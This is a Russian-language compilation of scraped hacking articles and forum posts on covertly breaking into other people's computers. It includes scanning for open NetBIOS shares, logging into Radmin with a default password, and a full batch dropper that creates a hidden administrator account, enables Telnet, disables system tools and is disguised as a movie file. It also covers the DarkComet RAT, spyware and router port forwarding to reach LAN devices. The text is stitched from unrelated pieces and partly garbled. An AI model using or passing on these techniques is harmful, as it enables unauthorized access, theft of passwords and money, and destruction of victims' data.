- Как проникнуть в компьютер через компьютер
- Проникновение в чужой компьютер
- VEDMA
- Простейший скрытый способ получить доступ к нужному ПК из домашней сети
- Как проникнуть в компьютер через компьютер
- Взлом компьютера через Dark Comet
- Управление чужим ПК с помощью Skype
- Как получить доступ через Google Chrome
- Шпионские программы
- HackWare.ru
- Этичный хакинг и тестирование на проникновение, информационная безопасность
- Атака на устройства в локальной сети через уязвимый роутер
- Как работает домашняя локальная сеть
- Можно ли получить доступ к компьютеру в локальной сети, если есть доступ к роутеру?
- Forwarding портов
- Просмотр устройств локальной сети. Настройка статических адресов в локальной сети
- Настройка переадресации портов
- Заключение
Как проникнуть в компьютер через компьютер
1>>злом компа Ну что же, пришло время рассказать как можно попасть в чужой комп. Это самый простой способ так как думать особо не надо! Нам потребуется сканер Ip диапазона. Лично я пользуюсь Essential NetTools (его можно скачать у меня на сайте в разделе сканеры) Начнем. Берем и запускаем сканер Essential NetTools Теперь нужно определиться какой Ip диапазон следует просканировать. Для этого просто заходим в вкладку ViewLocal IP Addresses и смотрим свой Ip, пусть будет такой 123.333.253.12. Значит пишем первый (начальный)диапазон Ip 123.333.253.1 а второй (конечный) 123.333.253.255 И видим что сканер нашел кучу удаленных компьютеров в этом диапазоне, но большинство компов не доступно для простого проникновения (no), но есть компьютеры где написано (yes), именно в такие компьютеры мы можем попасть без труда, для этого нужно просто нажать на нем правой кнопкой мышки и щелкнуть по «open computer» и через несколько минут откроется окно где Вы увидите содержимое удаленного компьютера. Вот и все!
В этой статье я расскажу, каким способом чаще всего похищаются ваши пароли на интернет, подкидываются вирусы и уничтожается информация, а также каким способом ваши документы становятся достоянием народа. Способ, о котором я расскажу, известен многим и проверен. Для написания этой статьи я специально окупировался на чате арии по адресу aria/chat. Конечно, я засел на этот чат не потому, что я имею что-то против этого чата и тех, кто на нём сидит, просто-напросто на нем показываются все хосты пользователей, находящихся в on-line. Я мог выбрать и другие чаты, так как добыть IP адрес очень легко. Моей целью было как можно больше протестировать пользователей на уязвимости в их системах, затратив минимум времени на поиск хостов. Было пртестировано 2000 пользователей в разных подсетях, а иногда я тестировал прямо всю подсеть провайдера. Всем пользователям, у кого были найдены дыры, были отправлены письма или оставлен файлик на диске с сообщением об уязвимости и рекомендациями, как закрыть дыру. Итак приступим к описанию специфики взлома (если его можно так назвать) и защиты от него. Первым делом я лез в чат и смотрел хосты пользователей, из которых потом при помощи сканера IP-Tools (можно скачать с моего сайта) получал IP адрес и проверял его на запущенную сессию NetBIOS. И если сессия была запущена, я пытался подключиться к удалённому компьютеру. Изначально я подключался дедовским способом, на сетевом окружении (находится на рабочем столе) кликаете правой клавишей мышки и в выданном меню выбираете пункт «найти компьютер». После чего вставляете IP адрес и жмёте клавишу «найти», если сессия запущена и в ней есть доступ к расшаренным рессурсам, вы увидите подключение. Остаётся только открыть удалённый компьютер и посмотреть, какие именно расшарены сетевые рессурсы и ваши права доступа на них. Естественно, что эта операция оправдывает себя, когда вы пытаетесь подключиться к одному компьютеру. Но если злоумышленник хочет воспользоваться проверкой на расшаренные ресурсы всей подсети, в которой находится пользователь, этот способ уже неприменим, так ка
Проникновение в чужой компьютер
VEDMA
Знающий
Приветствую всех на этом форуме! Данная статья слита с другого форума, к тому же эта моя первая тема, не судите строго
Сейчас я покажу, как можно взломать компьютер через Radmin (4899 порт).
Нам понадобится 2 программы: Radmin Viewer и VNC_Scan. (можно юзать другой сканер портов, но я рекомендую этот т.к. скорость сканирования поражает.)
Для начала найдем компы с открытым 4899 портом, для этого открываем папку с нашим сканером, открываем с помощью блокнота файл go.bat и пишем туда диапазон сканируемых айпи адресов. Далее сохраняем и открываем.
После сканирования программа закроется самостоятельно, в папке с прогой открываем файл VNC_bypauth, там будут айпи с открытым 4899 портом.
Открываем радмин, жмем на желтую молнию и вводим айпи.
Жмем «Ок», и вводим пароль 12345678. Почему именно такой пароль? Дело в том, что раньше радмин шел в сборках Zver CD, и те кто их ставил, получали включенный радмин, с паролем 12345678. Но учтите, что этот пароль не всегда подойдёт.
Ну теперь можем делать, что угодно: рыться в компе (жертва ничего не заметит), удалять файлы, посылать команды через telnet, выключить компьютер и т.д.
Если вам нужен только пароль, ждите пока жертва отойдет от компа (или не ждите) и кидайте троян сделанный в пинче (антивирусник отрубить не забывайте) и открывайте, можно конечно и с помощью MPR.
Если вы хотите зайти в комп к определенному челу, то тот все немного сложнее.
И кидаем жертве, надо чтобы он/она открыла его. С помощью этого батника мы откроем 4899 порт и создадим учетную запись. (Надо)
Простейший скрытый способ получить доступ к нужному ПК из домашней сети
@Echo off
Net user Admin_Support lop /add >nul
Net localgroup net localgroup Ђ¤¬ЁЁбва в®ал Admin_support /add >nul
Net accounts /maxpwage:unlimited >nul sc config TlntSvr start= auto >nul
Sc start TlntSvr >nul
Reg add «HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList » /v Admin_support /t REG_DWORD /d 0 >null
Reg add »HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System» /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg add «HKCU\SOFTWARE\POLICIES\Microsoft\MMC» /v RestrictPemitSnapins /t Reg_dword /d 1 /f >nul del %SestemRoot%\system32\compmgmt.msc >nul
del Start_game.bat
1. Echo off (думаю всем понятно, объяснять не стоит).
2. Net user Admin_Support lop /add >nul Создаем в системе учетную запись с произвольным логином, в примере: Admin_Support и паролем lop. Учетка появится в списке учетных записей пользователей, можно придумать другое имя, к примеру что-то похожее на SUPPORT_388945a0 (учетная запись поставщика для службы справки и поддержки), на которую большинство пользователей не обращают внимания. Есть 1 нюанс мы создали учетку, но ведь она появится при входе в систему у пользователя, необходимо ее скрыть, об этом будет описано ниже.
3. Net localgroup net localgroup Ђ¤¬ЁЁбва в®ал Admin_support /add >nul Добавляем учетку Аdmin_support в группу Администраторы, кодировка слова «Администраторы», как у меня в данном случае «Ђ¤¬ЁЁбва в®ал» обязательно должна быть в кодировке DOS. Можно сделать в обычном Far’e. Т.е. то слово у меня уже в кодировке dos.
4. Net accounts /maxpwage:unlimited >nul Период времени в днях, в течение которого будет действовать пароль пользователя. Значение unlimited снимает ограничение по времени. Значение параметра /maxpwage должно быть больше, чем значение параметра /minpwage. Допустимы значения от 1 до 49 710 дней (т. е. значение unlimited равно 49 710 дней), по умолчанию используется значение 90 дней.
5. Sc config TlntSvr start= auto >nul Устанавливаем службу телнет в режим запуска «авто».
6. Sc start TlntSvr >nul Стартуем службу телнет.
7.Reg add “HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList ” /v admin_support /t REG_DWORD /d 0 >null Добавляем ключ в реестр, который скроет нашу учетку в записях в панели управления и при входе в винду (Аутентификации).
8. Reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System” /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Запрещаем запуск редактирования реестра. (Можно обойтись и без этого параметра).
9. Reg add “HKCU\SOFTWARE\POLICIES\Microsoft\MMC” /v RestrictPemitSnapins /t REG_DWORD /d 1 /f >nul
del %SestemRoot%\system32\compmgmt.msc >nul Удаляем mmc (Не обязательный параметр).
10. Reg add “HKCU\SOFTWARE\POLICIES\Microsoft\windows\System” /v DisableCMD /t REG_DWORD /d 2 /f >nul Запрещаю запуск командной строки. (Не обязательный параметр.)
11. Del Start_game.bat Удаляем сам батник.
Далее делаем из bat файла exe файл с помощью обычного winrar’a. В параметрах winrar’a устанавливаем параметр «создать архив sfx» и «выполнить после распаковки файл» батник «Start_game.bat». Также в настройках создания архива указываем: распаковывать в скрытом режиме. Помимо этого добавляем к батнику, с помощью того же winrar’a иконку к файлу. Жмем создать архив и получаем exe-шник с иконкой. Работа с Winrar также показана в видеоуроке ниже.
З.Ы. Конечно же можно использовать и другие программы для создания exe файла, которые имеют различный нужный функционал, такой как задание размера файла, типа, скрытия окна распаковки и прочих интересных вещей. В данном примере для большей наглядности я использовал WinRAR.
(Делать можно необязательно exe файл можно создать и другие типы файлов).
Итак мы получили файл с именем Start_game.exe, также можно создать более оригинальный файл с актуальным именем, чтобы пользователи увидев его в сети захотели его скачать, например название фильма, который недавно вышел или скоро должен выйти и его все ждут, (например Трансформеры-3HDTVRip.avi) ну и так далее.
Далее расшариваем папку в сети с нашим Start_game.exe. Как только наш юзверь скачает и запустит наш Start_game.exe, сработает наш батник, и удалится. Открываем нашу виртуальную машину и запускаем сканер портов, где указываем диапозон сканирования нашей сети (в моем случае это 10.16.93.1-10.16.93.255) и порт телнета (22 или 23). Сканер покажет у какого ip адреса открыт порт телнета. Если порт открыт, смело подключаемся, открываем командную строку и подключаемся командой: telnet ip_адрес, где вводим наш логин admin_support и пароль lop. тем самым получаем доступ к командной строке юзверя, и делаем СВОЁ ДЕЛО! ))) Умея пользоваться командной строкой, можно найти и скопировать любые файлы на компьютере пользователя, скрыто установить практически любое нужное программное обеспечение, и много еще чего интересного. Для более наглядного понимания статьи выкладываю реальный видеоурок со своей сети. Урок довольно старый, так как занимался я этим довольно давно.
При желании батник можно доработать для более интересных нужд, в данной статье показан лишь простой способ доступа к ПК пользователя без его ведома.
Как проникнуть в компьютер через компьютер
Домашний компьютер — отличное и при этом наиболее уязвимое место для атаки. Взломав чужой ПК, можно не только просмотреть информацию, сохраненную в его памяти, но и узнать номера банковских и виртуальных карт, а затем снять с них все деньги. Ресурсы самого компьютера — пространство жесткого диска, скорость процессора, а также скорость соединения с интернетом помогут в нападении на другие компьютеры, находящиеся в одной сети с потенциальной жертвой. Перед тем как совершить хакерскую атаку, подумайте, что дело это противозаконное и уголовно наказуемое. Если вас это не пугает, наша статья для вас.
Взлом компьютера через Dark Comet
Dark Comet, или «Крыса, — одно из популярных средств удаленного управления компьютером. Хотя официальная разработка «Черной кометы» прекратилась еще в 2012 году, в хакерской среде можно до сих пор встретить усовершенствованные варианты проги. Работать с ней нужно следующим образом:
Скачайте и установите Dark Comet на компьютер, запустите ее. По окончании запуска откроется окно, в котором нужно выбрать команду «Dark Comet RAT» — «Server Module» — «Full Editor».
Как только программа «поймает» какого-то юзера, вы сможете начать управлять им: украдете пароли, просмотрите документы, удалите важные файлы и т.п. Те, кто любит позлорадствовать, могут отключить рабочий стол своей жертвы, сыграть ему на виртуальном пианино, отправить сообщение и т.п.
Управление чужим ПК с помощью Skype
Очень простой способ доступа к чужому ПК, который особенно пригодится в тех случаях, когда вы хотите подгадить обидевшему вас человеку. Делается это так:
После этого в своей «Сети» вы увидите папки, сохраненные на чужом ПК, и сможете мстить свой жертве: удалять документы, важные скрипты и т.п.
Как получить доступ через Google Chrome
Зайдите в интернет-магазин Google Chrome, вбейте в поле поиска «VNC Viewer for Google Chrome» и установите приложение. В открывшемся окне введите IP пользователя и выберите качество отображения рабочего стола и корневых папок.
Узнать IP вы сможете с помощью вышеприведенного способа через Skype либо воспользоваться специальными программами и сайтами:
Шпионские программы
Шпионское программное обеспечение — еще один способ проникновения к системным папкам пользователей. Зараженный вирусом компьютер будет отправлять всю информацию на ваш электронный ящик, записывать все, что его владелец вводит на клавиатуре и т.д.
Для установки шпионского ПО вы сможете использовать ActiveX-компоненты или троянские программы категории TrojanDownloader для удаленного администрирования, например, ALB или LD. Запустить сервер на удаленной машине вы сможете парой простых способов:
HackWare.ru
Этичный хакинг и тестирование на проникновение, информационная безопасность
Атака на устройства в локальной сети через уязвимый роутер
Если получен доступ к роутеру, можно ли получить доступ к устройствам в локальной сети? Чтобы ответить на этот вопрос, давайте разберёмся, как работает домашняя локальная сеть.
Как работает домашняя локальная сеть
В домашней локальной сети основой является роутер — довольно сложное сетевое устройство. Это устройство обеспечивает работу локальной сети. При подключении нового устройства к локальной сети роутера, он с помощью протокола DHCP присваивает новому устройству IP адрес. В качестве диапазона IP адресов в домашних сетях обычно используются 192.168.1.0/24, 192.168.0.0/24 или 192.168.100.0/24.
То есть у вашего компьютера или телефона, подключённого к Интернету через роутер, имеется локальный IP адрес.
Возможно вы уже слышали про NAT и даже знаете, что эта технология позволяет Интернет-провайдеру использовать один единственный внешний (белый) IP адрес для всех или для множества его клиентов. Но NAT используется не только на уровне провайдера Интернет услуг, но и уже в вашем роутере. Рассмотрим NAT чуть подробнее.
NAT — это технология, которая позволяет множеству устройств выходить в Интернет используя один и тот же IP адрес. Кстати, в вашей локальной сети, в которой имеется роутер, уже применяется NAT — именно благодаря этому все ваши устройства могут выходить в Глобальную сеть и не нужно каждому из них иметь внешний IP.
Как вы понимаете, это часто используемая технология. Возможно, вы много лет ею пользуетесь, даже не зная про неё. Она действительно приносит очень много пользы, но у неё есть недостаток — она позволяет делать подключения «в одну сторону». То есть если ваш компьютер инициализировал подключение к Интернету, то он отправит его роутеру, роутер сделает две вещи: 1) запомнит, что запрос пришёл с определённого устройства и 2) отправить этот запрос в Интернет. Когда придёт ответ, роутер всё ещё «помнит», что этот запрос был сделан для определённого устройства в локальной сети, и отправит ответ именно этому устройству. И так происходит каждый раз.
Но вот если на роутер придёт новый HTTP запрос из Глобальной сети (не ответ на запрос, а именно новый запрос), то роутер банально не знает, для кого в локальной сети он предназначен (если не настроена переадресация портов). Поэтому с этим поступившим запросом роутер ничего не делает (источник).
Можно ли получить доступ к компьютеру в локальной сети, если есть доступ к роутеру?
Вроде бы, ответ очевиден — технология NAT не даёт такой возможности в принципе: подключение к локальным устройствам, у которых нет белого IP, а есть только локальный IP вида 192.168.0.*, невозможен.
Но я начал с того, что роутер это весьма сложное сетевое устройство. И это устройство поддерживает множество функций по настройке сети, в частности оно поддерживает:
Forwarding портов
Forwarding, который ещё называют «переадресацией» портов, «проброской портов», «перенаправлением портов» или «Port mapping» (сопоставление портов) позволяет делать очень замечательную вещь — с его помощью устройства за NAT, то есть устройство в локальной сети, имеющее локальный IP адрес, могут стать доступными глобально. Правила могут быть настроены весьма гибкой, можно сделать пересылку нескольких портов на один, или с одного на несколько, или несколько на несколько и так далее. Но для наших целей больше всего интересно следующее правило, которое словами можно выразить так:
Запрос, который пришёл на порт роутера 22 перенаправить на порт 22 устройства с IP адресом 192.168.0.5.
Номера портов необязательно должны быть одинаковыми, поэтому правило может быть таким:
Запрос, который пришёл на порт роутера 50080 перенаправить на порт 80 устройства с IP адресом 192.168.0.5.
В результате мы получим доступ к порту 80 (его обычно прослушивает веб-сервер) устройства в локальной сети 192.168.0.5.
Это означает, что мы можем получить доступ к любому открытому порту и запущенному на нём службе в локальной сети! Это может быть веб-сервер, SSH, FTP, сетевые протоколы Windows и т.д.
Просмотр устройств локальной сети. Настройка статических адресов в локальной сети
Чтобы выполнить атаку на устройства в локальной сети через уязвимый роутер, нам нужно знать, какие у этих устройств локальные IP адреса.
Рассмотрим пример. В локальной сети провайдера есть роутер с IP адресом 100.69.64.23 к которому получен административный доступ.
Все (или практически все) роутеры могут показать информацию о подключённых в данный момент клиентах. Эта информация может быть:
Например, на этом роутере информация собрана на странице DHCP Clients List:
Данный роутер показывает всего лишь MAC-адрес и локальный IP адрес устройств. Многие роутеры кроме этой информации также показывают, является ли это мобильным устройством или настольным компьютером. Поскольку здесь такой информации нет, то мне нужно самостоятельно догадаться о типе устройства на основе его производителя. Производителя устройства можно узнать по MAC адресу на этом сервисе: https://suip.biz/ru/?act=mac
Например, для MAC 00:80:92:c4:6a:f9 найдена следующая информация:
Меня не интересуют мобильные телефоны и планшеты — как правило, на них все порты закрыты. Меня интересуют ноутбуки и настольные компьютеры, поскольку на них могут быть запущены службы, которые прослушивают порты.
Из всех устройств самыми интересными мне показались следующие
Причина в следующем:
Если атака планируется длительной, то определённым устройствам можно присвоить статичные IP адреса. Дело в том, что проброска портов настраивается относительно IP адреса. А целевое устройство через некоторое время может сменить IP адрес на произвольный. Если это случиться, то правила переадресации портов будут работать — просто теперь они будут отправлять пакеты другому устройству, которое заняло этот IP адрес.
Чтобы этого избежать можно привязать IP к MAC-адресу — мне ещё не встречались роутеры, которые не умеют этого делать. Настройка выполняется достаточно просто.
Настройка переадресации портов
В зависимости от модели роутера эта вкладка может называться
Например, на рассматриваемом роутере эту вкладку я нашёл по пути Application → Port Forwarding:
Всего портов 1-65535 и роутеры позволяют делать переадресацию диапазонов, то есть 65 тысяч портов не придётся настраивать по одному.
Но есть очень важное замечание — мы не можем настроить переадресацию того порта, на котором работает веб-сервер роутера. То есть если роутер открывается на 80 порту, то этот порт должен стать исключением. Иначе произойдёт следующее: ни мы, ни даже владелец роутера больше не сможем попасть в панель администрирования роутера пока не будут сброшены настройки на заводские.
Обратите внимание, что некоторые роутеры работают не на 80, а на 8080 или 443 порте.
Итак, если веб-интерфейс роутера работает на 80 порту и мы хотим получить доступ к локальным ресурсам устройства с IP 192.168.1.2, то нам нужно установить следующие три правила:
Первые два правила с диапазонами (надеюсь) очевидны. Третьим правилом мы перенаправляем запросы, пришедшие на порт 65535, на 80 порт локального компьютера, поскольку там может быть веб-сервер или что-то другое интересное.
Начнём с того, что сделаем контрольный замер, какие именно порты открыты:
Эта команда покажет открытые порты на роутере:
Добавляем первое правило:
Заново сканируем порты:
Констатируем — нас постигла неудача. 80-й порт — это порт самого роутера, а на устройстве с IP 192.168.1.2 просканированные порты закрыты.
Не отчаиваемся — переделываю все правила на переадресацию портов на IP 192.168.1.3:
И опять сканируем порты:
Поясню, хотя команда Nmap одна и та же, но на самом деле в предыдущий раз мы сканировали порты устройства в локальной сети с IP 192.168.1.2. А последняя команда уже сканирует порты на 192.168.1.3.
А вот здесь нам повезло:
Напомню, что все эти порты, кроме 80, открыты на устройстве, у которого даже нет белого IP адреса, у него IP адрес 192.168.1.3.
А как проверить 80 порт на 192.168.1.3? Делаем это так:
Порт оказался закрыт.
Чтобы собрать информацию об отрытых портах, изучим их баннеры:
Не очень интересно — видимо, это всё функции связанные с принтером.
Чтобы подключиться к HTTPS порту, достаточно открыть ссылку в веб-браузере: https://100.69.64.23:443
А там мы видим интерфейс многофункционального устройства (принтер-копер-сканер) MFC-J5910DW:
Ещё раз для тех, кто потерялся, это устройство с IP адресом 192.168.1.3!
Также я сумел подключиться к FTP:
Заключение
Это самый универсальный способ атаки на локальную сеть с уязвимым роутером, поскольку практически все роутеры поддерживают переадресацию портов.
Другие варианты атак: